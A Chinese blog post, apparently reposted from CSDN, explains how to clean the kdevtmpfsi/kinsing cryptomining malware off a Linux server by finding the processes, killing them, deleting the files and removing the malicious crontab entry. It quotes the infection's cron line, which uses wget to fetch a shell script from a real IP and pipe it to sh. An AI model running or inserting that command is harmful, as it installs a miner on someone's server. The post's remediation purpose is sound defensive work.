【服务器】挖矿病毒 kdevtmpfsi(一针见效)

于 2020-07-23 13:53:57 发布
阅读量1k 收藏 2
点赞数
分类专栏: 服务器 文章标签: 挖矿病毒 kdevtmpfsi
原文链接:https://blog.csdn.net/oYuZhongManBu1234/article/details/104281503
版权

附:尝试了许多普通kill 和 rm 操作,发现根本无法解决问题。分析原因在于定时任务为删除掉。
状态:CPU爆满,导致线上服务宕机。
图片是盗的,进程占用是真实的。

1、# top
查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi

2、# netstat -natp
根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了

此时,挖矿脚本大概率定时在你的crontab里面。

crontab -l ,发现异常定时任务,* * * * * wget -q -O -http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

解决办法:

top命令找到kdevtmpfsi和kinsing的进程号A和B
systemctl status 进程A

rm -fr /var/tmp/kinsing 和 rm -fr /tmp/kdevtmpfsi
kill -9 进程A 和 kill -9 进程B
cd /var/spool/cron 查看是否有相关的木马定时任务在执行(root文件里面为定时任务)有的话删掉再重启下crontab(命令:systemctl restart crond.service)
后续操作:(找到文件,全部删除,若没有则无需操作)
find / -name kdevtmpfsi
find / -name kinsing
————————————————
版权声明:本文为CSDN博主「华子007」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/oYuZhongManBu1234/article/details/104281503

非凡的世界
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
博客
在Windows Server上安装Socks服务端
04-22 34
服务器,打算在上面安装一些服务玩玩,例如,上网的时候使用自己服务器的带宽和流量上网,那么在服务器上安装一个Socks服务就可以实现这种功能,只要在服务器上安装一个轻量级隧道Socks5代理,即可加密网络通道,目前有几种不同的版本的安装方法,下面是其中之一。"local_address":"127.0.0.1",//默认。"server":"127.0.0.1",//服务器 IP。"method":"aes-256-cfb",//加密方式。"password":"123456",//密码。
博客
fastadmin 自动创建的表格界面右上角那个搜索框,指定搜索字段
04-18 26
fastadmin 自动创建的表格界面右上角那个搜索框,指定搜索字段。 默认搜索的是表格主键。 没啥用可以在控制器里配置,要搜索的字段, 如在控制器类里, 添加这个成员属性即可, 还是支持模糊搜索的, 很强大protected $searchFields = "sitename,sourceid,name,email,user_type,created_at";原文链接:https://blog.csdn.net/qq_34700162/article/details/1371560
博客
php实现ISO8601时间格式(带T和Z)和常规日期时间格式(东八区UTC+8)的相互转换
04-17 101
请注意,这里使用的是 DateTime::ATOM 常量,它代表了与 ISO 8601 兼容的日期时间格式。输出中的 +00:00 表示时间偏移量,即与 UTC 时间相差的时区偏移。要将 “2023-04-06 01:44:43” 转换为 ISO 8601 时间格式,您可以使用 PHP 的 DateTime 类和 format 方法。要将"2023-04-06T01:44:43.000Z"这个字符串转换为年月日时分秒的格式,你可以使用PHP的DateTime类和format方法。
博客
PM2基本使用
04-12 21
通过pm2启动node项目,通过pm2 ls可以看到,node项目是可以正常启动,但是就是不能访问项目接口。原文链接:https://blog.csdn.net/weixin_44953643/article/details/127022507。pm2 start index.js --name 进程名 //启动应用并设置进程名。pm2 start index.js -i max //启用群集模式(自动负载均衡)pm2 start index.js //启动node项目。
博客
thinkphp实现对两个字段或or条件搜索
03-04 410
原文链接:https://blog.csdn.net/yeyinshi/article/details/50467768。Adstext是数据库表,$data['_logic'] = 'or';thinkphp实现对两个字段或or条件搜索。
博客
fastadmin 修改弹窗大小
12-23 310
通用在对应js文件里①、添加按钮(修改操作列代码)原本:修改后:text: __('积分明细'),title: __('积分明细'),uid={id}',Layer.alert("接收到回传数据:" + JSON.stringify(data), { title: "回传数据" });},//返回true时按钮显示,返回false隐藏弹窗大小:
博客
【fastadmin】fastadmin修改弹窗大小
12-09 65
https://blog.csdn.net/pmlptf/article/details/100063077
博客
怎么动态修改data-rule的属性
12-05 163
参数:{String} key - 字段 name 或者 #id。参数:{Object} obj - 字段参数 Hash。参数:{Object} field - 字段参数。描述:动态配置字段参数。描述:动态配置字段参数。
博客
【Python从入门到进阶】28、xpath的安装以及使用
12-01 60
https://blog.csdn.net/acmman/article/details/131705392
博客
仓储管理-货位编号的方法
12-01 636
利用保管区中的现成参考单位如建筑物第几栋、区段、排、行、层、格等,按相关顺序编号。如同地址的市、区、路、号一样。库区号是整个仓库的分区编号,货架号则是面向货架从左至右编号,货架层次号即从下层向上层依次编号,货架列号即面对货架从左侧起横向一次编码号。将库房内所有的货架,按进入库门的方向、自左至右安排编号,继而对每排货架的夹层或格眼,在排的范围内以自上至下、自前至后的顺序编号。【例】“3-4-3-8”编号,就是指3号库房(3号货场)、4号货架(4号货区)、3号层次(3号排次)、8号货位(8号垛位)。
博客
PHP 判断给定两个时间是否在同一周,月,年
12-01 390
判断是否在同一月(可以使用上面的思路来实现,但这里使用另一个思路)
博客
PHP 8.3 大升级:20 个新特性全面解析
11-29 936
PHP 8.3 是流行的服务器端脚本语言的最新版本,带来了许多新功能和改进,旨在简化 Web 开发并提高性能。这些增强功能包括只读类、新函数 json_validate() 、Randomizer 类的扩展以及更合适的日期/时间异常。它们将彻底改变 PHP 开发体验,使其更加高效、安全,以满足 Web 开发人员和企业的需求。
博客
ThinkPHP的方法接收json数据问题
11-29 541
后来在解决过程中发现原因是ThinkPHP的I()方法默认使用的是htmlspecialchars()方法过滤,json字符串中的双引号被转换成了html实体("),原来的json数据已经不再是json格式了。但是打印出还未解析的值却打印得出来。后面查清楚原因之后,我找了字符串的其他解析方法,后面发现只要把I()方法的第二个参数,也就是设置过滤字符串方法改为strip_tags(I($str, '', 'strip_tags')),strip_tags函数使用来去除HTML标签的,就可以解析。
博客
分享一些基于php商城案例
11-29 627
案例1:​​​​​​http://www.9520.xin/案例2:http://ptll.hasbuy.com/案例3:http://likeshop.9520.xin/mobile案例4:http://www.hasbuy.com/
博客
小而美:持续盈利的经营法则
11-29 305
我的意思并不是让你用低于他们应得报酬的工资来剥削善良勤劳的人,而是说要雇用打算创业或者其他可能成为极简主义创业者的人:为他们提供在一个运转良好、能够盈利的公司里学习的机会,给他们丰厚的报酬,给他们一个在赚钱的同时,可以按照自己喜欢的方式安排其他时间的机会——甚至可能创建他自己的极简主义企业。从长远来看,给每个人自主权可以让你的身份地位与你的员工相同,这样你就可以与工程师肩并肩写代码,与设计师一起做设计,花时间创造和构建有影响力的东西,而不是不停地管理他人。船就是你的生意,宝藏就是产品和市场的最佳契合点。
博客
读书笔记之《价值》张磊
11-29 218
并购投资的出发点并不是追求投资规模或者单纯的投资收益,更关键的,是在原有商业模式创新进入阶段性瓶颈的情况下,判断科技赋能能否成为驱动产业升级的新价值所在,能否通过科技创新对现有商业模式进行精细化打磨,通过引入新的资源改善被并购公司的长远状况。在新消费的概念中,产品及其品牌包含了在服务过程中与消费者沟通的全方位要求,换句话说,零售即服务,内容即商品,所见即所得,物质组成的产品力和文化组成的品牌力共同成为理解消费新趋势的复合视角。有些钱不能要,如果出资人不理解我们的坚持,我们从- -开始就无法与之磨合。
博客
国内开源好用商城盘点—PHP
11-29 249
iWebShop 是一款基于【PHP 语言】+【MYSQL 数据库】开发的开源的 WEB 电商 B2B2C(平台自营 + 商家入驻)建站系统,采用 MVC 架构(Yii 框架思想)设计模式精心设计的一款产品,它功能丰富,使用简单,架构优良,安全性高,具有良好的扩展性。likeshop基于「ThinkPHP + Vue + Nuxt + uni-app」实现的免费开源商城系统,支持H5、小程序、APP,微信支付、支付宝支付、短信、云存储、优惠券、秒杀、拼团、抢购等主流功能,专业团队维护。
博客
[PHP]ShopXO企业级B2C免费开源商城系统 v2.3.1
11-25 511
基于ThinkPHP v5.1、ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持。2. 分销(可配置1~3级、分享赚取佣金、小程序商品海报、取货点、佣金可配置具体到SKU(比例和固定金额))PC+H5、支付宝小程序、微信小程序、百度小程序、头条&抖音小程序、QQ小程序。
博客
crmeb商城系统部署报错, Error: Address already in use[98]
11-24 86
crmeb商城系统部署报错, Error: Address already in use[98]2、 如果服务器上有其他的项目使用了此端口,修改一下此项目的运行端口,然后重启swoole即可。1、首先确定服务器上只有一套多商户代码,或者是没有其他地方用到了 8324端口;执行 php think swoole restart 命令的时候,提示。进入命令行执行以下命令。如何进入命令行点这里。这个是服务器的 2019 端口被占用了。执行了以后,在重启swoole就可以了;
博客
CRMChat客服系统搭建教程
11-24 146
php think swoole restart命令是以PHP安装目录下执行,官方文档没有这一块的说明。实际安装和文档会不一致正确安装方法如下。文档预览 - Gitee.com。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值